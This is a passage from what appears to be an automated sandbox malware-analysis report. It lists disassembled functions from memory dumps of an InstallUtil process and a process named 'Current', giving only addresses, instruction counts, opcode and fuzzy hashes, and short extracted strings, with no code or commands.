                                                        Function 0127D4C4 Relevance: .0, Instructions: 27COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ed1ca41222f1215e7f49b60f7c588f81d9ae6fbd38cf40808f65ea7a960621bc
                                                        • Instruction ID: 10346eb98d9a35657de58658674dfc0dafbdee5cf406b65f4fd5a2aca02923d0
                                                        • Opcode Fuzzy Hash: ed1ca41222f1215e7f49b60f7c588f81d9ae6fbd38cf40808f65ea7a960621bc
                                                        • Instruction Fuzzy Hash: B6E02693C5C188CBE3028BEAE8630FABF30CEE324174464C7D149DB161D678E206EB11
                                                        Function 01272020 Relevance: .0, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c59b179bff33bf7517a170e975ace044f4e72bdd128ef29419507a4bb5e5d7df
                                                        • Instruction ID: 2be7e9a532f9ddf656837a3c96b66edeb62f39ef54a242ce2bd4e50450fd548f
                                                        • Opcode Fuzzy Hash: c59b179bff33bf7517a170e975ace044f4e72bdd128ef29419507a4bb5e5d7df
                                                        • Instruction Fuzzy Hash: 10D02B31D2022F83CF04E7A5DC004DFF738EEC2260B514622D41033000FB302658C2E0
                                                        Function 01278270 Relevance: .0, Instructions: 18COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                        • Instruction ID: f8898722fa1dafb39d802bc0d415a1308b241aa8956260f4d66aafb198da5c2e
                                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                        • Instruction Fuzzy Hash: 55C08C3321C5282EA725108F7C4AEA7BB8CE3C16B5B350237F61CC32009893AC8001F4
                                                        Function 0127A71D Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d650ddec9a1a0ed3947e0b4afd2d133ba02c92d4e8d9c908d77130f07511290e
                                                        • Instruction ID: 2112db72d8555761c68633a4362c25ce345c3d0221fffed3195afa2c916a4798
                                                        • Opcode Fuzzy Hash: d650ddec9a1a0ed3947e0b4afd2d133ba02c92d4e8d9c908d77130f07511290e
                                                        • Instruction Fuzzy Hash: 6CD0677BB410189FCB059F98E8808DDB7B6FB9C221B048516EA15E3265C6319921DB50
                                                        Function 01275EB0 Relevance: .0, Instructions: 16COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 561b0c610550d043db792e313a3990a57a92e56e501ad6d166a7cf364a22359f
                                                        • Instruction ID: 3b34eef3e6e7244a576118b44f250e82d4c3ca0fdcf8c7766163bb797531f819
                                                        • Opcode Fuzzy Hash: 561b0c610550d043db792e313a3990a57a92e56e501ad6d166a7cf364a22359f
                                                        • Instruction Fuzzy Hash: 3BD02B705043450BC326F730EC854543B15AB80704B805894F4040A22AED6C098B9763
                                                        Function 0127FBFB Relevance: .0, Instructions: 15COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 89039a0ebfb470ec6eb3320a771c3c3a028eafe3ab16ae2cd0a3bf056b7850dd
                                                        • Instruction ID: ef2e86865fb40103aaac77bd31b0bcc47e69037d2db9cebbf4040b28667b2c29
                                                        • Opcode Fuzzy Hash: 89039a0ebfb470ec6eb3320a771c3c3a028eafe3ab16ae2cd0a3bf056b7850dd
                                                        • Instruction Fuzzy Hash: D1D06775D5411CDBCB20DF94DA452EDB7B0EF95300F0029D69809B2210D6305A509F11
                                                        Function 01275EC0 Relevance: .0, Instructions: 12COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea073b8e49c4a42deb1785dd229ab4feaf049ef0f56c39a682b015e8cc26d3fc
                                                        • Instruction ID: bcfa97582083f62271289612a072b70901ab56880df739491ec8eec5f96b89a9
                                                        • Opcode Fuzzy Hash: ea073b8e49c4a42deb1785dd229ab4feaf049ef0f56c39a682b015e8cc26d3fc
                                                        • Instruction Fuzzy Hash: AEC0127150070947C519FB75ED85555771AA7C0704F406D14B10916239DE7C1A8B5792

                                                        Non-executed Functions

                                                        Function 06612807 Relevance: 14.1, Strings: 11, Instructions: 388COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: "$0oVp$Hwq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq$PHsq
                                                        • API String ID: 0-3469494655
                                                        • Opcode ID: 4c41b963702b00206278af44d70b97067e8533edcd68c3b05c87fc99a1211282
                                                        • Instruction ID: 3d1d9c82ddb03732cf63395e6ba63da2e8e1709d1595bb8386bb9aed57a011e3
                                                        • Opcode Fuzzy Hash: 4c41b963702b00206278af44d70b97067e8533edcd68c3b05c87fc99a1211282
                                                        • Instruction Fuzzy Hash: 2512E2B4E002188FDB58DFA5D994BDDBBB2BF89300F1080A9D509AB365DB315E85CF50
                                                        Function 066133B8 Relevance: 1.5, Strings: 1, Instructions: 222COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp
                                                        • API String ID: 0-771760206
                                                        • Opcode ID: 0e085ac90a259b9664691b56efb6b133391254a3420ac74e5f0f1b552094d4ce
                                                        • Instruction ID: d2331dfb473548c0c2cead475df2ee9769fbcf47363e27e116ed7cc69f7e5bba
                                                        • Opcode Fuzzy Hash: 0e085ac90a259b9664691b56efb6b133391254a3420ac74e5f0f1b552094d4ce
                                                        • Instruction Fuzzy Hash: 98B1A574E10218CFDB54DFA9D894A9DBBB2FF89310F1481A9E819AB365DB30AD41CF50
                                                        Function 066133A8 Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0oVp
                                                        • API String ID: 0-771760206
                                                        • Opcode ID: ad87723b2e384754561d9730435e518f96f987c84644178b814afe1986d328e2
                                                        • Instruction ID: fb1725baeb09f54d0108fd68ba7d7d9e704c589137110f0c9beeedafbf3770a2
                                                        • Opcode Fuzzy Hash: ad87723b2e384754561d9730435e518f96f987c84644178b814afe1986d328e2
                                                        • Instruction Fuzzy Hash: FF519374E00608CFDB48DFAAD984A9DBBF2BF89300F148169D419BB365DB349942CF54
                                                        Function 0127E538 Relevance: .6, Instructions: 596COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24d6057cb8e32728243e52768175889e97eec1e02f7a1bdf2be2cb689caed150
                                                        • Instruction ID: 7b03971ebad14db31e7bac2aa72bbbb63d0b026f8937808f889e510c58127fd3
                                                        • Opcode Fuzzy Hash: 24d6057cb8e32728243e52768175889e97eec1e02f7a1bdf2be2cb689caed150
                                                        • Instruction Fuzzy Hash: 83529C74E01229CFDB64DF69C884B9EBBB2BB89300F1085E9E509A7354DB359E85CF50
                                                        Function 06615A70 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ac13fd51b75c0df9f422d79d35bc06ea5f846b92b2bbac042cc956a6b272adda
                                                        • Instruction ID: 25f2095e3df09ad6d5191b761670157cafb5b45c7ed5fe1bbf775618baadd6de
                                                        • Opcode Fuzzy Hash: ac13fd51b75c0df9f422d79d35bc06ea5f846b92b2bbac042cc956a6b272adda
                                                        • Instruction Fuzzy Hash: 1EC1D2B4E01218CFDB54DFA5D984BADBBB2BF89304F2080AAD409AB354DB355E81CF51
                                                        Function 06615618 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 14ee8d31c13fd6640ebdf76c528446b801e11af1fe5f2f332a120e41e2f1b2b2
                                                        • Instruction ID: 860603e38dfb33f45d8ff0be6f3afe315da20d4a43614571b2c935b35586f754
                                                        • Opcode Fuzzy Hash: 14ee8d31c13fd6640ebdf76c528446b801e11af1fe5f2f332a120e41e2f1b2b2
                                                        • Instruction Fuzzy Hash: 2EC1D2B4E00218CFDB54DFA5D994BADBBB2BF89300F2080AAD409AB355DB355E81CF51
                                                        Function 06615EC8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 31ab5e7f10afc922f3e9c1964f389b1b7934495b3b7cd3c9436cf307306cc6c5
                                                        • Instruction ID: 9bc2841291e77c44d3a8b9c8d63ac03f6eb784ba0ad46c862b10b010cda4feaa
                                                        • Opcode Fuzzy Hash: 31ab5e7f10afc922f3e9c1964f389b1b7934495b3b7cd3c9436cf307306cc6c5
                                                        • Instruction Fuzzy Hash: B9C1B274E00218CFDB54DFA5D984BADBBB2BF89304F2080AAD409AB355DB355E81CF51
                                                        Function 06616778 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8e0466dfcfcf6b3272dfe320bd35517ef67ec7bfc7eaaaa65b25b11b3fcab59
                                                        • Instruction ID: aa8d0e183fadc6a79c2140866bf92f2feac29c8f87dd7c7c54c490db016cd425
                                                        • Opcode Fuzzy Hash: b8e0466dfcfcf6b3272dfe320bd35517ef67ec7bfc7eaaaa65b25b11b3fcab59
                                                        • Instruction Fuzzy Hash: CDC1D274E00218CFDB54DFA5D994BADBBB2BF89304F2080AAD409AB355DB359E81CF51
                                                        Function 06616320 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 97095cf8a1a9e494e3c4ddf3f7ac125add92c1f433c5f2cc292591ae71f58a5a
                                                        • Instruction ID: 613f28ce17d28f4fc60a1e966c5ad5e8ef6e9ff4bfb698d527734bae537ffee8
                                                        • Opcode Fuzzy Hash: 97095cf8a1a9e494e3c4ddf3f7ac125add92c1f433c5f2cc292591ae71f58a5a
                                                        • Instruction Fuzzy Hash: 5CC1D274E00218CFDB54DFA5D994BADBBB2BF89304F2080AAD409AB355DB359E81CF51
                                                        Function 06616BD0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 98e1fc24ed29d36c124ee1be3d2d735f77d9bf8eca9f644253a3ffd8634fa2eb
                                                        • Instruction ID: baed7bb89c2da0aa343a89374143ee0173d4d644fe33884046ea43c15ed8b328
                                                        • Opcode Fuzzy Hash: 98e1fc24ed29d36c124ee1be3d2d735f77d9bf8eca9f644253a3ffd8634fa2eb
                                                        • Instruction Fuzzy Hash: 36C1B174E00218CFDB54DFA5D984BADBBB2BF89304F2480AAD409AB355DB359E81CF51
                                                        Function 06610040 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 83067f1a68f33c88bef476d7db07f2f19954f40170d041cf74866ccf2a758c72
                                                        • Instruction ID: 7ed06f1a1d8a75296bf8ea848acd8d37c29ff3f19e3e9a5f78a15b687be118e6
                                                        • Opcode Fuzzy Hash: 83067f1a68f33c88bef476d7db07f2f19954f40170d041cf74866ccf2a758c72
                                                        • Instruction Fuzzy Hash: 2FC1D274E00218CFDB54DFA5D984BADBBB2BF89304F2080AAD409AB355DB359E81CF51
                                                        Function 06617050 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6a33bd27baa0f2768dfaf901172bb9addf8adb533b9ac885b0b158627ee6c44d
                                                        • Instruction ID: 36ad371c9da7ccc948939c70e09a8e854ebdc510ef07a2a5756820de5de18b24
                                                        • Opcode Fuzzy Hash: 6a33bd27baa0f2768dfaf901172bb9addf8adb533b9ac885b0b158627ee6c44d
                                                        • Instruction Fuzzy Hash: E8C1D274E00218CFDB54DFA5D984BADBBB2BF89304F2480AAD409AB355DB359E81CF51
                                                        Function 066108F0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c26014c9c911c08db7c60cb9f9c921c02d203ee9780e2e48e6e5b34051c35771
                                                        • Instruction ID: fd3c5efed7deca722022ffae4d9daa4b34625100d5d9d42863cdb0f8098bc005
                                                        • Opcode Fuzzy Hash: c26014c9c911c08db7c60cb9f9c921c02d203ee9780e2e48e6e5b34051c35771
                                                        • Instruction Fuzzy Hash: 19C1C274E00218CFDB54DFA5D994BADBBB2BF89304F2080AAD409AB355DB359E81CF51
                                                        Function 066174A8 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0efa880875dc64d046ec50174228bebcd9fdc01b8f4ccea0c6015ca495347f64
                                                        • Instruction ID: c855cbf604e9243894ac17ad465023e06030e40905f90e79c89fa6bca70bf262
                                                        • Opcode Fuzzy Hash: 0efa880875dc64d046ec50174228bebcd9fdc01b8f4ccea0c6015ca495347f64
                                                        • Instruction Fuzzy Hash: F6C1C074E00218CFDB54DFA5D984BADBBB2BF89300F2480AAD409AB355DB359E81CF51
                                                        Function 06610498 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 19129a832425ee2c38dc4451d6159a391f428b2bb2fcc5e7a3e1c3500c0142d6
                                                        • Instruction ID: a6bd1d8ed411316d0f758d2231ce52cf9071bf17d2c41d3628d7e9c47a83ceb3
                                                        • Opcode Fuzzy Hash: 19129a832425ee2c38dc4451d6159a391f428b2bb2fcc5e7a3e1c3500c0142d6
                                                        • Instruction Fuzzy Hash: 3EC1C174E00218CFDB54DFA5D984BADBBB2BF89304F2080AAD409AB355DB359E81CF51
                                                        Function 06610D48 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c2df5ba2340d8a44b103d268aed6267f4a1a405904f62141cb0868406912e21c
                                                        • Instruction ID: 44a5ad4ae4f3366aa94773cd6b157bdac9ec096eae914c4728fc8d3d41d0cb88
                                                        • Opcode Fuzzy Hash: c2df5ba2340d8a44b103d268aed6267f4a1a405904f62141cb0868406912e21c
                                                        • Instruction Fuzzy Hash: 53C1B274E01218CFDB54DFA5D984B9DBBB2BF89304F2080AAD809AB355DB355E81CF51
                                                        Function 06617D58 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3d2a6154915f6c39b1424636c37b5e2b4af7ce3c1d13b23ad54a52eba4b03910
                                                        • Instruction ID: 932b3467a9888bf4ed2a78aeda8db52584864b0c90bfc0a6ce9bf68455298d1d
                                                        • Opcode Fuzzy Hash: 3d2a6154915f6c39b1424636c37b5e2b4af7ce3c1d13b23ad54a52eba4b03910
                                                        • Instruction Fuzzy Hash: B2C1C175E00218CFDB54DFA5D984BADBBB2BF89304F2080AAD409AB355DB359E81CF51
                                                        Function 06617900 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a9935e4a43bfa39d25de02fee6444a26678faf2cf96abcd3f1b5bef543c7314c
                                                        • Instruction ID: ef3e345590cad4b12230c90f811a719ea0232cf594240cc9784dff5f2f75b2ac
                                                        • Opcode Fuzzy Hash: a9935e4a43bfa39d25de02fee6444a26678faf2cf96abcd3f1b5bef543c7314c
                                                        • Instruction Fuzzy Hash: 38C1C274E00218CFDB54DFA5D984BADBBB2BF89300F2490AAD409AB354DB359E81CF51
                                                        Function 066181B0 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b8d90ff720d0928b7c1d2008399f963bb8bed2b15a9843a2b772414e0def257a
                                                        • Instruction ID: c4775703d4b49bc45a5285b8abb9b540c4e0577a63fc24bfd6f7a91bbd2273d8
                                                        • Opcode Fuzzy Hash: b8d90ff720d0928b7c1d2008399f963bb8bed2b15a9843a2b772414e0def257a
                                                        • Instruction Fuzzy Hash: DDC1B174E00218CFDB54DFA5D984BADBBB2BF89304F2480AAD409AB355DB359E81CF51
                                                        Function 06615198 Relevance: .3, Instructions: 268COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4491744952.0000000006610000.00000040.00000800.00020000.00000000.sdmp, Offset: 06610000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6610000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0cba75aa801107f50af7e4ee80a44c404c6f8fa498f6bd27e47e05beb3b1ec3d
                                                        • Instruction ID: a2a40f99068da91e8fdfb1e15039d5a0be952409a33072a7c4692bc37e546914
                                                        • Opcode Fuzzy Hash: 0cba75aa801107f50af7e4ee80a44c404c6f8fa498f6bd27e47e05beb3b1ec3d
                                                        • Instruction Fuzzy Hash: 9EC1B3B4E01218CFDB54DFA5D984B9DBBB2BF89304F1080AAD409AB355DB355E81CF51
                                                        Function 0127EB6B Relevance: .2, Instructions: 193COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 66a0e39730f1dede9640933f5a8f79e3cd3c0af7edfe2fc4e60706626048f1a7
                                                        • Instruction ID: bf9f0c3056aea79d1a2eb82c47e9f3734fc9d91fa89563356d74bca74417d040
                                                        • Opcode Fuzzy Hash: 66a0e39730f1dede9640933f5a8f79e3cd3c0af7edfe2fc4e60706626048f1a7
                                                        • Instruction Fuzzy Hash: A5A1AD74E01228CFDB65DF64C884B9ABBB2BF4A300F1085EAE409A7354DB719E81CF51
                                                        Function 0127ED4C Relevance: .1, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6c531649c8a70c2b5180addade06491a54210b4e1fde2bcb96579e7267780792
                                                        • Instruction ID: 215b297e789ee84bd2023eeaf0cceb2984b0f5be6dbc8470af66191cdc1e6ea0
                                                        • Opcode Fuzzy Hash: 6c531649c8a70c2b5180addade06491a54210b4e1fde2bcb96579e7267780792
                                                        • Instruction Fuzzy Hash: A151A274A01228CFCB65DF64D894B9AB7B2FF4A301F5089E9D40AA7354CB719E81CF50
                                                        Function 012760A0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4482862156.0000000001270000.00000040.00000800.00020000.00000000.sdmp, Offset: 01270000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_1270000_InstallUtil.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \;sq$\;sq$\;sq$\;sq
                                                        • API String ID: 0-2251010532
                                                        • Opcode ID: ca7a99e5a069b663fda0f259904256728a1b13eb19608bea4265c133063f1bd4
                                                        • Instruction ID: 5a5810383548687643c00f379b3bff065fa32153f81689aa6cf55cce197cee83
                                                        • Opcode Fuzzy Hash: ca7a99e5a069b663fda0f259904256728a1b13eb19608bea4265c133063f1bd4
                                                        • Instruction Fuzzy Hash: CD01B1317308168FEB299A3DC44592777F6BFC8660315416AE601CB3A2DE72DC418780

                                                        Executed Functions

                                                        Function 0715ECD8 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2290686402.0000000007140000.00000040.00000800.00020000.00000000.sdmp, Offset: 07140000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_7140000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Dzq
                                                        • API String ID: 0-4123679374
                                                        • Opcode ID: baea6b5a42de747916489fe639be3bb5626ae08e51f12dc81ae7a2abd0c5d7e5
                                                        • Instruction ID: 55bd4934f584ee44d74d4eb4c5a3197df0e6be6c5c04a6dd249fe0dc2d77ab8e
                                                        • Opcode Fuzzy Hash: baea6b5a42de747916489fe639be3bb5626ae08e51f12dc81ae7a2abd0c5d7e5
                                                        • Instruction Fuzzy Hash: E8D1E6B4E00219CFDB58DFA9D890A9DBBB2FF49300F1085A9D419AB365DB35AD81CF50
                                                        Function 058480E8 Relevance: .3, Instructions: 289COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2287616373.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_5840000_Current.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c982f2b930f96b6f6c0aeaf0339f07e4539e7206a6c9972a0ba2bbf8b34edaeb
                                                        • Instruction ID: 6e56d345f605b3fce506ec2796672fdf6d96be4525786791ef551d0189f31fd2
